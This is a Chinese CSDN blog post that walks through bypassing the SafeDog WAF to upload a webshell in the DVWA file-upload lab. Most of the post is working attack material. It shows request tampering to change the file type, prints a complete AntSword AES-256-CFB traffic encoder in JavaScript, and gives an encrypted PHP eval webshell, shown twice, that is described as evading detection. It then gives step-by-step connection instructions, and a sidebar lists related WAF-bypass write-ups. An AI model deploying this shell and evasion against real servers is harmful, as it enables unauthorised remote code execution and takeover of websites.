文件上传绕过安全狗

最新推荐文章于 2024-04-02 09:27:08 发布
最新推荐文章于 2024-04-02 09:27:08 发布
阅读量235 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64904947/article/details/131870236
版权

以dvwa靶场文件上传漏洞为例,安装安全狗后尝试上传一个一句话木马,发现被拦截

 接下来尝试抓包修改文件类型,看看能不能上传上去,修改文件类型后上传成功,将info.php改为png

 

 但是上传上去的是图片,不方便用蚁剑连接。而且修改文件类型仅仅只是做到了落地免杀,没有做动态免杀,在用蚁剑连接木马的时候还是需要访问php文件还是需要读到内存里,一旦读取还是会被安全狗拦截,所以需要给蚁剑装一个编码器,因为普通的编码可能还是会被安全狗识别拦截,这里去github上下载一个

https://github.com/AntSwordProject/AwesomeEncoder/tree/master/php/encoder

选择256位

打开编码器的源码 ,里面自带了一个 免杀的木马,等下使用这个木马进行上传

/**
 * php::aes-256-cfb (zeroPadding)编码器
 * Create at: 2019/05/10 01:10:53
 * Author: @Medicean
 * 
-----------------------------------------------
<?php
@session_start();
$pwd='ant';
$key=substr(str_pad(session_id(),32,'a'),0,32);
$iv=$key;
@eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-256-CFB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING, $iv));
?>

-----------------------------------------------
KEY的长度	aes-x-cbc
16	aes-128-cbc
24	aes-192-cbc
32	aes-256-cbc
 */

'use strict';
const path = require('path');
var CryptoJS = require(path.join(window.antSword.remote.process.env.AS_WORKDIR, 'node_modules/crypto-js'));

function get_cookie(Name, CookieStr="") {
   var search = Name + "="
   var returnvalue = "";
   if (CookieStr.length > 0) {
     var sd = CookieStr.indexOf(search);
     if (sd!= -1) {
        sd += search.length;
        var end = CookieStr.indexOf(";", sd);
        if (end == -1){
          end = CookieStr.length;
        }
        returnvalue = window.unescape(CookieStr.substring(sd, end));
      }
   } 
   return returnvalue;
}

function decryptText(keyStr, text) {
  let buff = Buffer.alloc(32, 'a');
  buff.write(keyStr,0);
  keyStr = buff.toString();
  let decodetext = CryptoJS.AES.decrypt(text, CryptoJS.enc.Utf8.parse(keyStr), {
    iv: CryptoJS.enc.Utf8.parse(keyStr),
    mode: CryptoJS.mode.CFB,
    padding: CryptoJS.pad.ZeroPadding
  }).toString(CryptoJS.enc.Utf8)
  return decodetext;
}

function encryptText(keyStr, text) {
  let buff = Buffer.alloc(32, 'a');
  buff.write(keyStr,0);
  keyStr = buff.toString();
  let encodetext = CryptoJS.AES.encrypt(text, CryptoJS.enc.Utf8.parse(keyStr), {
    iv: CryptoJS.enc.Utf8.parse(keyStr),
    mode: CryptoJS.mode.CFB,
    padding: CryptoJS.pad.ZeroPadding,
  }).toString()
  return encodetext;
}

/*
* @param  {String} pwd   连接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data, ext={}) => {
  // ##########    请在下方编写你自己的代码   ###################
  // 从扩展中获取 shell 配置
  let headers = ext.opts.httpConf.headers;
  if(!headers.hasOwnProperty('Cookie')) {
    window.toastr.error("请先设置 Cookie (大小写敏感), 可通过浏览网站获取Cookie", "错误");
    return data;
  }
  let session_key = "PHPSESSID";
  let keyStr = get_cookie(session_key, headers['Cookie']);
  if(keyStr.length === 0) {
    window.toastr.error("未在 Cookie 中发现PHPSESSID", "错误");
    return data;
  }
  data[pwd] = encryptText(keyStr, data['_']);
  // ##########    请在上方编写你自己的代码   ###################
  // 删除 _ 原有的payload
  delete data['_'];
  // 返回编码器处理后的 payload 数组
  return data;
}

新建编码器,选择php

 把代码复制进去

 添加完后点击保存

然后把上面给的木马上传上去。是一个免杀木马可以直接绕过安全狗

<?php
@session_start();
$pwd='ant';
$key=substr(str_pad(session_id(),32,'a'),0,32);
$iv=$key;
@eval(openssl_decrypt(base64_decode($_POST[$pwd]), 'AES-256-CFB', $key, OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING, $iv));
?>

然后用蚁剑尝试连接

在选择编码器的时候要选择自己刚刚添加的自定义的编码器名字,我这里定义的是a

 

 设置请求信息,找到登录该网站的cookie。这个编码器会对流量进行加密而加密所用的密钥就是cookie

 

添加进去,cookie要注意大小写

 

 之后即可连接成功

 

m0_64904947
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
绕过安全狗asp代码
06-10
安全狗asp程序 突破安全狗的拦截 绕过安全狗 本程序是在文件管理器的基础上开发的 仅供研究使用
33.三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗(六)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。写文章-CSDN
封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
m0_65712192的博客
10-19 1662
封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
web安全-数据包参数内容简介-文件上传WAF(安全狗)绕过方法
ran的博客
02-03 1213
由编成的知识可以知道一个语句结束的末尾需要添加分号,而参数filename的后面没有分号,由此可知这一整条语句可能到filename就截止了,由此可以猜想如果filename后面加一个分号以后,其后面就可能还可以添加其它内容。因为安全狗的匹配机制是匹配双引号里的内容,但是这里的双引号有前没有后,它就一直在找后面的那个双引号,但是没有找到,所以可能没有匹配到。有的参数值加了双引号,有的参数值没加双引号,由此可以想到加了双引号的就是可以随便修改的,而没加双引号的可能就是有着固定的一些参数值。
文件上传-绕过安全狗
weixin_44769042的博客
08-17 1383
实验环境 安全狗+phpstudy+upload-labs-master 安全狗开启后,会有一个后缀名上传黑名单 先上传一个图片马,抓包查看 若是正常后缀名,可以上传 换成.php ,就会上传失败 设法绕过(这里是以第二关为例,,过其他关时还要考虑那一关的代码绕过) 1.用单双引号防匹配绕过 将文件名写成 filename="php (去掉右侧引号,上传成功) 换成单引号也行(不加引号也可以) 上传成功,但是普通的木马文件会被扫出来 ...
[网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集
热门推荐
等风来
04-29 1万+
由于jpg是不被解析的,所以需要抓包将文件格式修改为php等。如下图,将filename="qiu.jpg"修改为filename="qiu.php"将路径与URL拼接,连接蚁剑。
文件上传绕过安全狗的一些方法
sGanYu
04-28 3763
目录 安全狗的安装 垃圾数据绕过: 数据包溢出绕过: 值匹配""的内容,后跟.php: 多个filename,绕过匹配: 白名单绕过: 测试工具:Burpsuite,安全狗 测试网站: 在没有安全狗的情况下,上传1.Php,以文件大小写后缀上传,是不会被拦截的,如下图 安全狗的安装 安全狗地址:网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改,选择windows操作系统,Apache版本选择4.0,一直默认安装即可 在默认安装时,会跳出需要填写关于Ap
文件上传之,waf绕过(24)
san3144393495的博客
05-20 1456
前期upload第二关的时候,判断的方式就是mime的类型的绕过绕过miem是图片类型就可以上传,没有验证后缀,这是代码的判断,我们在来探针一下防护软件是怎么判断的,现在第二关上传一个图片上去,抓住数据包,mime满足就可以上传,所以把上传的文件名字改成php格式,本来这是可以正常上传成功的。mime可以作为一个验证条件,验证mime来判断你个文件一个合法性的时候,可以通过更改mime来达到一个伪造,比如上传一个php文件,这时候可以更改为图片类来尝试绕过mime验证。
2016最新php免杀webshell过安全狗
03-05
这个文件可能是经过特殊处理的,比如包含了免杀技巧,使得它能够绕过安全狗的检测。 综上所述,这个压缩包提供的知识点主要集中在PHP免杀Webshell技术和如何绕过Web应用防火墙,尤其是针对2016年环境的安全策略。这...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
安全狗上传绕过+wbehshell免杀
09-05
服务器安全狗是一款集服务器安全防护和安全管理为一体的综合性服务器工具。支持Windows全系列操作系统(Windows2003/Windows2008/Windows2012 32位 64位)、Linux操作系统的服务器安全防护软件,从驱动层直接屏蔽攻击,保护服务器安全。自2011年推向市场后,迅速在服务器安全市场里占有一席之地。 这篇文档总结了一些安全狗上传绕过经验,供参考。
FCK上传绕过安全狗一则经验谈
12-13
FCK上传绕过安全狗一则经验谈
bypasswaf:关于安全狗和云锁的自动化绕过脚本
03-20
绕过安全狗sql注入篡改绕过云锁SQL注入篡改(可0警告绕过云锁)理论上来说规则越多速度也会越慢所以不追求隐蔽性的可以按需求修改规则针对最新版安全狗的任意文件上传bypass safedog_upload_yichu.txt safedog_...
文件上传常用绕过方式
最新发布
weixin_43077878的博客
04-02 2114
1.前端。
文件上传安全狗waf绕过思想
m0_48907714的博客
04-09 2473
本内容只做思想,因为这些已经是以前的了 上传参数名解析:明确有哪些东西能修改? Content-Disposition: 一般可更改 name: 表单参数值,不能更改 filename :文件名,可以更改 Content-Type:文件MIME,视情况更改 常见的绕过方法 数据溢出-防匹配(xxx… .) 符号变异-防匹配('和"和;) 数据截断-防匹配(%00 ;换行) 重复数据-防匹配(参数多次)x FUZZ大法 数据溢出-防匹配 符号变异-防匹配('和"和;) 去掉双引号 删除后面的" 切换成’
突破安全狗
duan_qiao925的博客
06-05 795
实验准备 Sql注入原理:用户能控制输入并构造恶意参数(多为sql语句),Web应用执行的代码拼接了未加过滤的nei'rong。
文件上传绕过安全狗WAF实战
永远是少年
10-09 4843
今天继续给大家介绍渗透测试相关知识,本文主要是文件上传绕过安全狗WAF实战。 一、环境搭建 二、绕过思路 三、绕过实战
最新版安全狗(v4.0.2.665) 文件上传 绕过
qq_41891666的博客
06-20 2042
0x00 前言: 继续上次 bypass 安全狗,这次测试的是 bypass 最新版安全狗来上传 php 一句话 0x01 实验环境: win7 sp1 + phpstudy v8.1(apache 2.4) + 安全狗v4.0.2.665 服务端脚本: <?php use function \move_uploaded_file as test; if (file_exists("upload/" . $_FILES["file"]["name"])) { echo $_FI
绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)
xuchen16的博客
09-26 5821
转载自:http://www.freebuf.com/articles/web/125084.html *本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载 这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。 废话不多说,切入正题。。。。 1、实验环境: Windows...
sqlmap绕过安全狗
08-25
对于绕过安全狗的问题,我必须强调尊重法律和道德规范,不鼓励或提供任何违法或不当的行为。绕过安全狗安全措施是非法的,并可能导致法律后果。 如果您是合法授权的安全测试人员,可以基于合法的测试范围和授权进行安全测试。在这种情况下,我建议您与网站所有者或系统管理员合作,在合法和合规的框架内进行测试,并确保获得适当的许可和授权。 记住在进行任何安全测试之前,始终要遵守适用的法律法规和道德准则,并遵守与该活动相关的所有合法要求和规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值